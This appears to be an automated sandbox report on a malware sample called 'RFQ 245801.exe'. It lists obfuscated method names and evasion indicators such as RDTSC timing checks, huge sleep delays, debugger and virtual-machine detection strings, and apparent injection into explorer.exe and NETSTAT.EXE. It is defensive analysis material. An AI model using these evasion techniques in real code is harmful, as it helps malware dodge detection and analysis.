Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, eXGkH9PtNjZJJbc2dM.cs High entropy of concatenated method names: 'Em6kMFoAPf', 'D61kxAfQRw', 'sPTkEmcsg9', 'i8Mkdnesh8', 'tvdkKTUhoV', 'OuOknGTlgA', 'LLnhmds5VmAinjOmDO', 'SWnWoMU5KNBUdliNpB', 'fYokkOfZnt', 'ej8kDCydEd'
Source: 0.2.RFQ 245801.exe.72b0000.4.raw.unpack, Y5N6j8ZlrgTP7fUCew.cs High entropy of concatenated method names: 'E7LM8IywVu', 'DteMj1sF8F', 'esDM5AUOi5', 'U7e5gYkNob', 'Jxk5zBx8p2', 'FHnMowkt8I', 'WjCMkL3STR', 'HSGM9kdSGy', 'nYEMDVt4r5', 'b8MMHS0PFs'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, WgiBpPxEFw5XWqUhVJ.cs High entropy of concatenated method names: 'GJM72b4XM', 'l6NiWwtcL', 'nyTBSVdyE', 'eMWayyWGd', 'm3wulBWkE', 'yymV0AiBK', 'uYcjcMSOUp132N6jS3', 'u7MtpBK49eG4oyE57U', 'QEdX8W5lj', 'I26SKvybS'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, fJLFWsoNNh2D9wwqVh.cs High entropy of concatenated method names: 'NIvMFtZOeP', 'FxXMJwU146', 'gAlM7RpRc8', 'PPoMiFRBjO', 'PGJM2sVfWo', 'B8PMBwZDAt', 'UGSMaV5HJi', 'ssCMbsnkWY', 'dUrMux6nZu', 'Yj8MV7rBGX'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, Pp6KbidXG6NYFVhHii.cs High entropy of concatenated method names: 'GDQfl9x7FM', 'Lkrfgj1lW6', 'alRXo0ep98', 'HnVXkYJLBT', 'M1hfelj4C3', 'r9NfRsOyFL', 'CADfQnDchs', 'gXFfmp6CTe', 'sgtfIWv1Cc', 'JW5fc9WNmx'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, ykvgwsy2sp0Dxo7e19.cs High entropy of concatenated method names: 'h0mpmK4BW4', 'L29pIYQFC2', 'T3ypcR7c1J', 'WtjpPEZdrd', 'jBxpTpIhqp', 'BgmpYIncW2', 'lakpWf8DED', 'xvhpl6RqgY', 'Mh0psWVFxE', 'MxEpgugcFR'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, aSTAvhByNgibKQ2Fu5.cs High entropy of concatenated method names: 'ensjiojMtT', 'OCbjB32da8', 'Hq0jb23GJk', 'ot0juUJsuF', 'C40jK2yF1B', 'P5jjn6AD0b', 'z7ejfu7Pq7', 'pgljXSLuZo', 'Xv7jA7spA0', 'VDZjSv2e3Q'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, evvAxakZCXhQan771b.cs High entropy of concatenated method names: 'aIk54VadLJ', 'Nbf5FjKw2t', 'RfX57YrIuA', 'mpp5i3MNfy', 'lno5BT7OIy', 't4n5acvJ2d', 'g7R5ua68Be', 'AlQ5VPS99b', 'kDtBkR8uAVrZKHOY2Id', 'GpEC038ZD19lmOGhD9y'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.cs High entropy of concatenated method names: 'puuD1Nwm8k', 'WpHD8aBqTC', 'hyBDpnN38A', 'SbZDjD26aV', 'tM9DGV4vix', 'UfxD5ZDZlq', 'AmdDMBwBBs', 'GcVDx6k9Zj', 'QqeDNcu62U', 'autDEPkuYU'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, wIPVxezBCi6yaK1kDK.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LcIAqNUlOE', 'zBxAKH4HpO', 'gsvAnKF9Mn', 'CO1Afyw5KG', 'Xj3AXDoIV6', 'E6jAArOjW2', 'AbSASMQIUG'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, Vj1PsPUkKgHXmyWVAr.cs High entropy of concatenated method names: 'BawXwvSkbc', 'ih9X0FXu8r', 'MYOX3LV9cK', 'Hv0XLo72cx', 'qW1Xm4gn28', 'PohXtX2TN7', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, cR2wkeeEmUg7K1hb5P.cs High entropy of concatenated method names: 'FCMKv4lKoN', 'MNgKR96FkT', 'NbgKmpTRG2', 'q9aKIMJtVF', 'leFK0i1gBY', 'l1eK3DrWLC', 'IPbKLXXxrK', 'NUiKtLrNHM', 'tg7K6U86V8', 'rjNKrg6AQb'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, JX4i456yo2MKdam2oZ.cs High entropy of concatenated method names: 'OUp51orFpZ', 'p2y5pnUJm3', 'Utf5G8m17e', 'CMY5MFhInp', 'y7A5xQCsAS', 'YbZGTExH0a', 'zy6GYJvG5T', 'yGQGWEC9Es', 'xVVGl35cyR', 'wt8GsOoNO7'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, QocsAcjbV9qKLZWBRE.cs High entropy of concatenated method names: 'Dispose', 'dBYksuBA4K', 'QJ990SyyKW', 'h0xyywG70G', 'co5kgiMbkc', 'N9pkz0G8J7', 'ProcessDialogKey', 'aAF9oriXPN', 'NLY9kKdbmC', 'pKE9930rop'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, R6B0AfnmHiIFCScC9n.cs High entropy of concatenated method names: 'qpyqb2KokD', 'D9cquH8ibZ', 'JM0qwlYFq0', 'N81q0BAd8g', 'NSQqLPa1LM', 'gOQqtoT16X', 'vkBqrQGOE7', 'i73qhl9v7d', 'z0jqvYH8EV', 'vfLqeQ9Ju4'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, gj4fiq0cbqS67yHNi8.cs High entropy of concatenated method names: 'FFJX8bUwFZ', 'KjWXpTNfWP', 'Pe1XjOjOmA', 'ynMXGulk6v', 'W7VX5hcGlQ', 'SmIXMp79sm', 'TSIXxoeoNp', 'ySuXN4Iv1E', 'QKDXE1uiIC', 'ySyXdfqKBw'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, BtID8LccH7jVfw8BjuT.cs High entropy of concatenated method names: 'ToString', 'kakSDgaZVr', 'CepSHrSoui', 'JJRS1Olgiu', 'fhYS85fMWI', 'J2jSpIvDP4', 'MQaSjTY9Qu', 'pw6SGks02G', 'xQOLxWFKfC6n3r966wl', 'xjBLoAFjco7dYnTLoEh'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, AWHXGwJvdG0koSWdHq.cs High entropy of concatenated method names: 'hLbAkYSVsD', 'ECLADBxr0X', 'jOoAH9fKyk', 'FHyA8HHOCJ', 'dLUApwRvFv', 't5WAGyaeSw', 'SmQA5jZAr9', 'l1LXWxhQnD', 'bQJXlnAfcN', 'NV8Xs3JRTB'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, jou9lSc2pb66G6VFaAF.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IgESmlorLN', 'huqSIAl9rd', 'rGrScfC6bb', 'jbXSP1v4BH', 'dUfSTlXA53', 'DIjSYW6ZPj', 'zyiSWIcUeQ'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, EOWlqHciZCVwJpnRUia.cs High entropy of concatenated method names: 'lCeAFxrg5Q', 'yq9AJfgBpr', 'gxpA7cv29g', 'OgaAi8lo5U', 'xcCA2ExvA3', 'qSeABp98hR', 'LZwAaKqk5A', 'FaEAbbqqob', 'oIuAukOBQo', 'OCrAV6PB7S'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, eXGkH9PtNjZJJbc2dM.cs High entropy of concatenated method names: 'Em6kMFoAPf', 'D61kxAfQRw', 'sPTkEmcsg9', 'i8Mkdnesh8', 'tvdkKTUhoV', 'OuOknGTlgA', 'LLnhmds5VmAinjOmDO', 'SWnWoMU5KNBUdliNpB', 'fYokkOfZnt', 'ej8kDCydEd'
Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, Y5N6j8ZlrgTP7fUCew.cs High entropy of concatenated method names: 'E7LM8IywVu', 'DteMj1sF8F', 'esDM5AUOi5', 'U7e5gYkNob', 'Jxk5zBx8p2', 'FHnMowkt8I', 'WjCMkL3STR', 'HSGM9kdSGy', 'nYEMDVt4r5', 'b8MMHS0PFs'

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: RFQ 245801.exe PID: 6716, type: MEMORYSTR
Source: C:\Users\user\Desktop\RFQ 245801.exe API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Users\user\Desktop\RFQ 245801.exe API/Special instruction interceptor: Address: 7FFE22210774
Source: C:\Users\user\Desktop\RFQ 245801.exe API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Users\user\Desktop\RFQ 245801.exe API/Special instruction interceptor: Address: 7FFE2220D8A4
Source: C:\Users\user\Desktop\RFQ 245801.exe API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Users\user\Desktop\RFQ 245801.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE22210774
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D8A4
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Users\user\Desktop\RFQ 245801.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\RFQ 245801.exe RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 26A9904 second address: 26A990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 26A9B7E second address: 26A9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\RFQ 245801.exe Memory allocated: 1130000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Memory allocated: 2B00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Memory allocated: 2900000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Memory allocated: 7780000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Memory allocated: 8780000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Memory allocated: 8930000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Memory allocated: 9930000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00409AB0 rdtsc 5_2_00409AB0
Source: C:\Users\user\Desktop\RFQ 245801.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6540 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3199 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2152 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 7787 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 872 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 881 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Window / User API: threadDelayed 3812 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Window / User API: threadDelayed 6160 Jump to behavior
Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\Desktop\RFQ 245801.exe API coverage: 1.7 %
Source: C:\Windows\SysWOW64\NETSTAT.EXE API coverage: 2.0 %
Source: C:\Users\user\Desktop\RFQ 245801.exe TID: 6772 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5428 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6476 Thread sleep count: 2152 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6476 Thread sleep time: -4304000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6476 Thread sleep count: 7787 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6476 Thread sleep time: -15574000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3624 Thread sleep count: 3812 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3624 Thread sleep time: -7624000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3624 Thread sleep count: 6160 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3624 Thread sleep time: -12320000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Source: explorer.exe, 00000006.00000002.4157421659.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000006.00000002.4156756426.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000006.00000002.4156756426.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000006.00000002.4157421659.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000006.00000000.1745616106.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000006.00000002.4156756426.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000006.00000000.1743773191.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.000000000982D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000006.00000000.1745616106.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000006.00000002.4151697507.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000006.00000000.1743773191.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0040ACF0 LdrLoadDll, 5_2_0040ACF0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730770 mov eax, dword ptr fs:[00000030h] 5_2_01730770
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730770 mov eax, dword ptr fs:[00000030h] 5_2_01730770
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730770 mov eax, dword ptr fs:[00000030h] 5_2_01730770
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730770 mov eax, dword ptr fs:[00000030h] 5_2_01730770
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730770 mov eax, dword ptr fs:[00000030h] 5_2_01730770
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730770 mov eax, dword ptr fs:[00000030h] 5_2_01730770
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730770 mov eax, dword ptr fs:[00000030h] 5_2_01730770
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730770 mov eax, dword ptr fs:[00000030h] 5_2_01730770
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730770 mov eax, dword ptr fs:[00000030h] 5_2_01730770
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01720750 mov eax, dword ptr fs:[00000030h] 5_2_01720750
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762750 mov eax, dword ptr fs:[00000030h] 5_2_01762750
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762750 mov eax, dword ptr fs:[00000030h] 5_2_01762750
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017AE75D mov eax, dword ptr fs:[00000030h] 5_2_017AE75D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017A4755 mov eax, dword ptr fs:[00000030h] 5_2_017A4755
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175674D mov esi, dword ptr fs:[00000030h] 5_2_0175674D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175674D mov eax, dword ptr fs:[00000030h] 5_2_0175674D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175674D mov eax, dword ptr fs:[00000030h] 5_2_0175674D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175273C mov eax, dword ptr fs:[00000030h] 5_2_0175273C
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175273C mov ecx, dword ptr fs:[00000030h] 5_2_0175273C
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175273C mov eax, dword ptr fs:[00000030h] 5_2_0175273C
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179C730 mov eax, dword ptr fs:[00000030h] 5_2_0179C730
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175C720 mov eax, dword ptr fs:[00000030h] 5_2_0175C720
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175C720 mov eax, dword ptr fs:[00000030h] 5_2_0175C720
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01720710 mov eax, dword ptr fs:[00000030h] 5_2_01720710
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01750710 mov eax, dword ptr fs:[00000030h] 5_2_01750710
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175C700 mov eax, dword ptr fs:[00000030h] 5_2_0175C700
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017247FB mov eax, dword ptr fs:[00000030h] 5_2_017247FB
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017247FB mov eax, dword ptr fs:[00000030h] 5_2_017247FB
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017427ED mov eax, dword ptr fs:[00000030h] 5_2_017427ED
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017427ED mov eax, dword ptr fs:[00000030h] 5_2_017427ED
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017427ED mov eax, dword ptr fs:[00000030h] 5_2_017427ED
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017AE7E1 mov eax, dword ptr fs:[00000030h] 5_2_017AE7E1
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0172C7C0 mov eax, dword ptr fs:[00000030h] 5_2_0172C7C0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017A07C3 mov eax, dword ptr fs:[00000030h] 5_2_017A07C3
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017207AF mov eax, dword ptr fs:[00000030h] 5_2_017207AF
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017D47A0 mov eax, dword ptr fs:[00000030h] 5_2_017D47A0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017C678E mov eax, dword ptr fs:[00000030h] 5_2_017C678E
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01752674 mov eax, dword ptr fs:[00000030h] 5_2_01752674
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017E866E mov eax, dword ptr fs:[00000030h] 5_2_017E866E
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017E866E mov eax, dword ptr fs:[00000030h] 5_2_017E866E
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175A660 mov eax, dword ptr fs:[00000030h] 5_2_0175A660
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175A660 mov eax, dword ptr fs:[00000030h] 5_2_0175A660
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0173C640 mov eax, dword ptr fs:[00000030h] 5_2_0173C640
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0173E627 mov eax, dword ptr fs:[00000030h] 5_2_0173E627
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01756620 mov eax, dword ptr fs:[00000030h] 5_2_01756620
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01758620 mov eax, dword ptr fs:[00000030h] 5_2_01758620
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0172262C mov eax, dword ptr fs:[00000030h] 5_2_0172262C
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01762619 mov eax, dword ptr fs:[00000030h] 5_2_01762619
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179E609 mov eax, dword ptr fs:[00000030h] 5_2_0179E609
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0173260B mov eax, dword ptr fs:[00000030h] 5_2_0173260B
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0173260B mov eax, dword ptr fs:[00000030h] 5_2_0173260B
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0173260B mov eax, dword ptr fs:[00000030h] 5_2_0173260B
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0173260B mov eax, dword ptr fs:[00000030h] 5_2_0173260B
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0173260B mov eax, dword ptr fs:[00000030h] 5_2_0173260B
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0173260B mov eax, dword ptr fs:[00000030h] 5_2_0173260B
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0173260B mov eax, dword ptr fs:[00000030h] 5_2_0173260B
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179E6F2 mov eax, dword ptr fs:[00000030h] 5_2_0179E6F2
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179E6F2 mov eax, dword ptr fs:[00000030h] 5_2_0179E6F2
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179E6F2 mov eax, dword ptr fs:[00000030h] 5_2_0179E6F2
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179E6F2 mov eax, dword ptr fs:[00000030h] 5_2_0179E6F2
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017A06F1 mov eax, dword ptr fs:[00000030h] 5_2_017A06F1
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017A06F1 mov eax, dword ptr fs:[00000030h] 5_2_017A06F1
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175A6C7 mov ebx, dword ptr fs:[00000030h] 5_2_0175A6C7
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175A6C7 mov eax, dword ptr fs:[00000030h] 5_2_0175A6C7
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017566B0 mov eax, dword ptr fs:[00000030h] 5_2_017566B0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175C6A6 mov eax, dword ptr fs:[00000030h] 5_2_0175C6A6
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01724690 mov eax, dword ptr fs:[00000030h] 5_2_01724690
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01724690 mov eax, dword ptr fs:[00000030h] 5_2_01724690
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017C4978 mov eax, dword ptr fs:[00000030h] 5_2_017C4978
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017C4978 mov eax, dword ptr fs:[00000030h] 5_2_017C4978
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017AC97C mov eax, dword ptr fs:[00000030h] 5_2_017AC97C
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01746962 mov eax, dword ptr fs:[00000030h] 5_2_01746962
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01746962 mov eax, dword ptr fs:[00000030h] 5_2_01746962
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01746962 mov eax, dword ptr fs:[00000030h] 5_2_01746962
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0176096E mov eax, dword ptr fs:[00000030h] 5_2_0176096E
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0176096E mov edx, dword ptr fs:[00000030h] 5_2_0176096E
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0176096E mov eax, dword ptr fs:[00000030h] 5_2_0176096E
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017A0946 mov eax, dword ptr fs:[00000030h] 5_2_017A0946
